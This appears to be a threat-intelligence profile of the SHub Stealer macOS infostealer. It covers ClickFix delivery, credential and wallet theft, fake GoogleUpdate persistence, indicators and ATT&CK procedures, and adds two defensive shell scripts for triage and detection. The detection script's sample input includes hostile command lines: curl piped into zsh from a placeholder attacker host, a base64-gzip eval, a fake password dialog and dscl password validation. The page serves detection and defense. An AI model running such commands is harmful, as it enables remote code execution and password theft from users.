SHub Stealer
SHub Stealer is a macOS infostealer actively deployed in multiple campaigns in 2025–2026, including ClickFix-style social-engineering operations and later installer-based delivery. It is commonly referred to as “SHub Stealer” and has also been observed as “SHub Stealer v2.0,” with one variant tracked under the build tag “Reaper.” Earlier campaigns tricked users into pasting malicious commands into Terminal from fake troubleshooting pages, fake GitHub installers, fake Apple security update prompts, IPL streaming lures, and a fake CleanMyMac site at cleanmymacos[.]org; additional reporting describes fake WeChat and Miro installers used by the Reaper variant. The malware is delivered through shell loaders that decode and decompress payloads, then execute an AppleScript second stage via osascript, often filelessly. Reported infrastructure and delivery paths include res2erch-sl0ut[.]com, coco2-hram[.]com, terafolt[.]com, and typo-squatted Microsoft-themed hosting, with some campaigns using applescript:// to invoke Script Editor and bypass newer Terminal paste protections in macOS 26.4.
Its core capability set is broad credential and data theft from macOS hosts. Reported targets include saved passwords and browser data from Chromium-based browsers, Firefox, and Safari; cookies and autofill data; macOS Keychain contents; iCloud-related data; Apple Notes; Telegram Desktop sessions; shell history; documents and media files; and cryptocurrency wallet data. Multiple sources state it targets over 100 browser wallet extensions and more than 20 desktop wallet applications, including Exodus, Atomic Wallet, Ledger Wallet, Ledger Live, Trezor Suite, Electrum, Coinomi, Guarda, Sparrow, Wasabi, Bitcoin Core, Monero, Litecoin Core, Dash Core, Dogecoin Core, and others. Some reporting notes theft of AWS credentials, SSH keys, Kubernetes configuration files, corporate SSO sessions, and crypto seed phrases in broader ClickFix campaigns where SHub Stealer was one of the payloads.
SHub Stealer uses a fake macOS password prompt, often styled as System Preferences, to harvest the user’s login password and validates it locally with dscl . -authonly, with some reports noting up to 10 retries. It stages collected data in temporary directories such as /tmp/shub_<random>/, compresses it, and exfiltrates it over HTTPS, including to /gate endpoints and heartbeat APIs such as /api/bot/heartbeat. Reported exfiltration and C2-related infrastructure includes terafolt[.]com/gate, terafolt[.]com/api/bot/heartbeat, res2erch-sl0ut[.]com/gate, coco2-hram[.]com/api/debug/event, hebsbsbzjsjshduxbs.xyz, and wallets-gate[.]io/api/injection. Observed telemetry includes events such as cis_blocked and loader_requested.
A notable feature is wallet backdooring for persistence and follow-on theft. SHub Stealer has been reported replacing app.asar files or entire wallet applications with trojanized versions of Exodus, Atomic Wallet, Ledger Wallet, Ledger Live, and Trezor Suite, then re-signing or otherwise modifying them so they continue to run. These trojanized wallets steal passwords, mnemonics, seed phrases, or seed files when the user next opens the wallet. Persistence on macOS is also established through LaunchAgents and fake Google update components, including com.google.keystone.agent.plist and a GoogleUpdate binary under ~/Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/GoogleUpdate; some reports also describe remote command execution via heartbeat responses. Additional capabilities reported for newer variants include remote access functionality, silent screenshot capture, audio muting during exfiltration, virtualization/sandbox checks, and a self-destruct routine.
Several sources describe geofencing behavior consistent with CIS avoidance: the loader checks for Russian or CIS-region keyboard layouts, sends a cis_blocked event, and exits if detected. Reporting also notes overlap in tradecraft and functionality with Macsync, AMOS, and Odyssey, and some analyses assess SHub Stealer as part of an AppleScript-based macOS stealer family. High-confidence indicators mentioned in the content include cleanmymacos[.]org, res2erch-sl0ut[.]com, coco2-hram[.]com, terafolt[.]com, wallets-gate[.]io, hebsbsbzjsjshduxbs.xyz, com.google.keystone.agent.plist, /tmp/shub_<random>/, and the GoogleUpdate persistence path under the user Library Application Support directory.
Techniques & procedures
32 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
2 techniques
Hosting Layer: The secondary payload packages are hosted on typo-squatted web domains mimicking legitimate Microsoft infrastructure.
The infection vector wraps its payload inside a seemingly normal, signed application installer disguised as standard collaboration tools like Miro or WeChat.
Initial Access
2 techniques
Victims are directed to high-fidelity, deceptive web interfaces that simulate legitimate services.
Reaper uses fake WeChat and Miro installers as lures... Instead of forcing text interaction, the infection vector wraps its payload inside a seemingly normal, signed application installer disguised as standard collaboration tools like Miro or WeChat.
Execution
6 techniques
The malware establishes persistence by creating a fake Google Update application and installing a LaunchAgent (com.google.keystone.agent.plist).
Initial commands leverage curl to fetch obfuscated payloads, which are piped directly into shell interpreters (bash/zsh), minimizing the disk footprint.
ClickFix variant that uses the applescript:// URL scheme to invoke the macOS Script Editor... This URL-encoded hyperlink runs a dual-track routine... while silently executing the curl command in the background to deliver an infostealer, bypassing Gatekeeper via user-coerced interaction.
Since February 2026, one observed campaign variant uses curl to pull a loader shell from attacker infrastructure the moment the ClickFix command runs. That loader is a zsh script, a macOS default shell that decodes and decompresses an embedded payload using Base64 and Gzip before executing it in memory using eval.
The page provides detailed instructions to the victim to open the Terminal and paste the command to complete the installation.
Attackers exploit this trust by providing malicious command strings that mimic legitimate installation procedures.
Persistence
3 techniques
The malware establishes persistence by creating a fake Google Update application and installing a LaunchAgent (com.google.keystone.agent.plist).
The malware establishes persistence by creating a fake Google Update application and installing a LaunchAgent (com.google.keystone.agent.plist). This service runs every 60 seconds.
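A host triage check for the persistence and staging artifacts this section and the overview name (an added example, not Mallory's or any vendor's code; SHUB_HOME and SHUB_TMP are assumed variable names, and the caveat about Chrome's genuine Keystone agent sharing the plist label is added here):

```shell
#!/bin/sh
# Added triage check for the host artifacts this page attributes to SHub Stealer:
# the com.google.keystone.agent.plist LaunchAgent, the fake GoogleUpdate binary
# under ~/Library/Application Support/Google/GoogleUpdate.app, and /tmp/shub_*
# staging directories. SHUB_HOME and SHUB_TMP are assumed names so the same
# function can be pointed at a mounted image or a test tree instead of a live host.
# Usage on a live host: source this file, then run `shub_hunt`.

# Print one finding per line; return 1 when anything matched, 0 when clean.
shub_hunt() {
    home=${SHUB_HOME:-$HOME}
    tmp=${SHUB_TMP:-/tmp}
    found=0
    plist="$home/Library/LaunchAgents/com.google.keystone.agent.plist"
    bin="$home/Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/GoogleUpdate"

    # Chrome's genuine Keystone agent uses this same plist label, so the label alone
    # is not an indicator; the discriminator is a ProgramArguments entry pointing at
    # the GoogleUpdate.app path from the report.
    if [ -f "$plist" ] && grep -q 'GoogleUpdate.app' "$plist"; then
        found=1
        # The report says the agent fires every 60 seconds; read StartInterval with
        # plain grep so this also works off-host where plutil is unavailable.
        interval=$(grep -A1 StartInterval "$plist" | tr -cd '0-9')
        echo "launchagent: $plist StartInterval=${interval:-unset}"
    fi
    if [ -f "$bin" ]; then
        found=1
        echo "fake-updater: $bin"
    fi
    for d in "$tmp"/shub_*; do
        [ -d "$d" ] || continue
        found=1
        n=$(find "$d" -type f | wc -l | tr -d ' ')
        echo "staging-dir: $d ($n files)"
    done
    return $found
}
```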
Privilege Escalation
3 techniques
The malware establishes persistence by creating a fake Google Update application and installing a LaunchAgent (com.google.keystone.agent.plist).
The malware establishes persistence by creating a fake Google Update application and installing a LaunchAgent (com.google.keystone.agent.plist). This service runs every 60 seconds.
Stealth
4 techniques
Line 13 displays an obfuscated curl command that uses the native tr utility to dynamically decode a hidden URL.
Long-term access is secured via LaunchAgents and .plist files, often masquerading as legitimate system or software updaters.
It then checks whether the infected system uses a Russian keyboard layout (a common CIS geofencing technique). If a Russian keyboard is detected, the script sends a "cis_blocked" telemetry event to the command-and-control server and terminates immediately.
Piping the payload directly into zsh for memory-resident execution to avoid disk detection.
Credential Access
7 techniques
The malware attempts to steal the macOS login password. It displays a fake “System Preferences” dialog (with the official LockedIcon) up to 10 times, asking the user to enter their password.
Exfiltration efforts focus on high-value data, including ... messaging session tokens (Telegram/Discord)
Once active on the host machine, Reaper runs a local configuration sweep that targets typical info-stealer objectives—vacuuming system profiles, local browser credential vaults, session cookies, and cryptocurrency wallet keys.
Exfiltration efforts focus on high-value data, including browser credentials (Chromium/Firefox), macOS Keychains
Exfiltration efforts focus on high-value data, including ... macOS Keychains
Exfiltration efforts focus on high-value data, including browser credentials (Chromium/Firefox)
Subsequent stages often involve a native-looking password prompt to facilitate credential harvesting under the guise of installation continuity.
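Detection logic for the Execution, Stealth and Credential Access procedures listed above, run over constructed process command lines (an added example, not from the page or any vendor; the regexes, the attacker.invalid placeholder host and the sample events are assumptions drawn from the report's descriptions):

```shell
#!/bin/sh
# Added detection rules for the command-line patterns this page attributes to the
# SHub Stealer ClickFix chain: curl piped into a shell, base64+gzip decoded into
# eval, a tr-decoded URL inside a command substitution, the fake "System
# Preferences" password dialog, dscl . -authonly validation, the keyboard-layout
# geofence, /tmp/shub_ staging and the /api/bot/heartbeat check-in. The patterns
# are assumptions drawn from the report's description, not the malware's own strings.

has() { printf '%s' "$LINE" | grep -Eq "$1"; }

# Print the rule names that fire for one command line, or "-" when none fire.
shub_classify() {
    LINE=$1; tags=""
    if has 'curl .*\|[ ]*(ba|z)?sh( |$)'; then tags="$tags piped_loader"; fi
    if has 'base64 (-d|-D|--decode)' && has '(gunzip|gzip -d|zcat)' && has '(^| )eval( |$)'; then
        tags="$tags decode_gzip_eval"
    fi
    if has 'curl .*\$\(.*tr '; then tags="$tags tr_decoded_url"; fi
    if has 'osascript' && has 'display dialog' && has 'hidden answer' && has 'System Preferences'; then
        tags="$tags fake_password_prompt"
    fi
    if has 'dscl \. -authonly'; then tags="$tags local_password_validation"; fi
    if has 'com\.apple\.HIToolbox'; then tags="$tags keyboard_layout_check"; fi
    if has '/tmp/shub_'; then tags="$tags staging_dir"; fi
    if has '/api/bot/heartbeat'; then tags="$tags c2_heartbeat"; fi
    tags=${tags# }
    printf '%s\n' "${tags:--}"
}

# Read process command lines from stdin and print only those that fire a rule.
shub_scan() {
    while IFS= read -r l; do
        t=$(shub_classify "$l")
        [ "$t" = "-" ] || printf '%s\t%s\n' "$t" "$l"
    done
}

# Constructed sample events (placeholder host attacker.invalid); the last two are benign.
shub_demo() {
    shub_scan <<'EOF'
curl -fsSL https://attacker.invalid/l.txt | zsh
eval "$(printf %s "$BLOB" | base64 -d | gunzip)"
curl -fsSL "$(printf %s "$ENC" | tr 'a-z' 'n-za-m')" | zsh
osascript -e 'display dialog "System Preferences wants to make changes." default answer "" with hidden answer'
dscl . -authonly "$USER" "$ANSWER"
defaults read com.apple.HIToolbox AppleEnabledInputSources
curl -fsSL https://example.com/tool.tar.gz -o tool.tar.gz
ls -la /tmp
EOF
}
```

Feed real process-creation telemetry to `shub_scan` on stdin; a single fired rule such as piped_loader is a lead, while several firing within one session is the ClickFix chain the report describes.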
Discovery
3 techniques
The first thing the loader does is system fingerprinting by collecting the hostname, macOS version, external IP address, and keyboard layout information.
Sensitive assets are staged in temporary directories (e.g., /tmp/shub_), compressed, and exfiltrated via encrypted HTTPS channels.
Collection
4 techniques
Once active on the host machine, Reaper runs a local configuration sweep that targets typical info-stealer objectives: vacuuming system profiles, local browser credential vaults, session cookies, and cryptocurrency wallet keys. The module is engineered to search local user paths for high-value text documents, PDFs, spreadsheet configurations, and database assets.
The malware attempts to steal the macOS login password. It displays a fake “System Preferences” dialog (with the official LockedIcon) up to 10 times, asking the user to enter their password.
Clicking on fake streaming links can result in full device compromise, including silent theft of passwords, banking credentials, browser sessions, and crypto wallets with a persistent backdoor left running in the background.
Sensitive assets are staged in temporary directories (e.g., /tmp/shub_), compressed, and exfiltrated via encrypted HTTPS channels.
Command and Control
2 techniques
The native LaunchAgent configuration is designed to trigger this GoogleUpdate beacon script automatically every 60 seconds, logging system details and checking in with the C2 server’s /api/bot/heartbeat endpoint.
Initial commands leverage curl to fetch obfuscated payloads
Exfiltration
1 technique
Sensitive assets are staged in temporary directories (e.g., /tmp/shub_), compressed, and exfiltrated via encrypted HTTPS channels.
Other
1 technique
IOCs tracked for this family
132 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
Recent activity
17 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A macOS infostealer used in ClickFix campaigns. The content describes staging stolen data in temporary directories such as /tmp/shub_, compressing it, and exfiltrating it over HTTPS. It also includes credential harvesting, persistence, anti-analysis, screenshot capture, and self-destruct capabilities.
A macOS information stealer framework whose Reaper variant uses fake WeChat and Miro installers, a multi-stage delivery chain, persistence via a User LaunchAgent masquerading as GoogleUpdate, and steals system profiles, browser credentials, session cookies, cryptocurrency wallet keys, and documents.
A macOS infostealer delivered via ClickFix-style lures on fake IPL streaming sites. It fingerprints the host, steals credentials, browser data, crypto wallets, Telegram sessions, Keychain and iCloud data, grabs files, injects code into wallet applications to steal seed phrases, exfiltrates collected data, and establishes persistence via a fake Google Update LaunchAgent that can execute commands from C2.
A stealer malware observed in the campaign targeting macOS users via deceptive troubleshooting pages, aimed at collecting private files, credentials, and cryptocurrency-related data.